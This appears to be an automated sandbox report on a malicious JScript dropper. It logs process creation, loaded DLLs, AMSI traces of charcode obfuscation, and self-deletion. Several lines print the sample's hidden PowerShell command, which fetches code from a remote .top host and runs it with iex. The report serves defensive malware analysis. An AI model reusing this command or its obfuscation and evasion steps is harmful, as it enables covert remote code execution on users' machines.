              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"Jump to behavior
              Source: FM5vWQHpqe.jsInitial sample: Strings found which are bigger than 50
              Source: classification engineClassification label: mal100.troj.expl.evad.winJS@4/5@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrlqki3w.wdu.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: FM5vWQHpqe.jsVirustotal: Detection: 19%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: n.pdb? source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoota source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbourcG source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdbat source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: icrosoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: soft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbu source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              JScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Wscript.Shell%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:146 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:146 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:623 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc");ITextStream.WriteLine(" exec:569 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc");ITextStream.WriteLine(" exit:623 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc r:112%2C111%2C119%2C101%2C114%2C115%2C104%2C101%2C108%2C108%2C32%2C45%2C110%2C111%2C112%2C114%2C111%2C102%2C10");ITextStream.WriteLine(" entry:617 o:%0Afunction%20fromCharCode() f:apply a0:null a1:112%2C111%2C119%2C101%2C114%2C115%2C104%2C101%2C108%2C108%2C32%2C45%2C110%2C111%2C112%2C114%2C111%2C102%2C105%2C108%2C101%2C32%2C45%2C101%2C120%2C101%2C99%2C117%2C1");ITextStream.WriteLine(" exit:617 o:%0Afunction%20fromCharCode() f:apply r:%22powershell%20-noprofile%20-executionpolicy%20bypass%20-WindowStyle%20hidden%20-C%20%22%20curl%20URL%20%7Ciex%22%22");ITextStream.WriteLine(" entry:644 f:sh25wWm2Gmp2");ITextStream.WriteLine(" exec:155 f:sh25wWm2Gmp2");ITextStream.WriteLine(" entry:158 o:%2272%2C84%2C84%2C80%2C26%2C15%2C15%2C78%2C90%2C89%2C19%2C84%2C86%2C66%2C66%2C23%2C18%2C71%2C19%2C14%2C84%2C79%2C80%2C15%2C17%2C14%2C80%2C72%2C80%2C31%2C83%2C29%2C77%2C73%2C78%2C84%2C83%2C17%2C19%22 f:split a0:%2");ITextStream.WriteLine(" exit:158 o:%2272%2C84%2C84%2C80%2C26%2C15%2C15%2C78%2C90%2C89%2C19%2C84%2C86%2C66%2C66%2C23%2C18%2C71%2C19%2C14%2C84%2C79%2C80%2C15%2C17%2C14%2C80%2C72%2C80%2C31%2C83%2C29%2C77%2C73%2C78%2C84%2C83%2C17%2C19%22 f:split r:72%2");ITextStream.WriteLine(" exit:644 f:sh25wWm2Gmp2 r:%22http%3A%2F%2Fnzy3tvbb72g3.top%2F1.php%3Fs%3Dmints13%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:611 o: f:Run a0:%22powershell%20-noprofile%20-executionpolicy%20bypass%20-WindowStyle%20hidden%20-C%20%22%20curl%20http%3A%2F%2Fnzy3tvbb72g3.top%2F1.php%3Fs%3Dmints13%20%7Ciex%22%22");IWshShell3.Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9410.js.csv");IHost.Name();ITextStream.WriteLine(" entry:4 o:Windows%20Script%20Host f:Sleep a0:6000");IHost.Sleep("6000");IHost.Name();ITextStream.WriteLine(" exit:4 o:Windows%20Script%20Host f:Sleep r:undefined");ITextStream.WriteLine(" entry:98 f:");ITextStream.WriteLine(" exec:99 f:");ITextStream.WriteLine(" exit:98 f: r:%22Wscript.Shell%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:146 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._000
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E842E pushad ; ret 2_2_00007FFB4B1E845D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E7C2E pushad ; retf 2_2_00007FFB4B1E7C5D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E845E push eax; ret 2_2_00007FFB4B1E846D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E7C5E push eax; retf 2_2_00007FFB4B1E7C6D

              Hooking and other Techniques for Hiding and Protection

              barindex
              Deletes itself after installation
              Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\fm5vwqhpqe.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
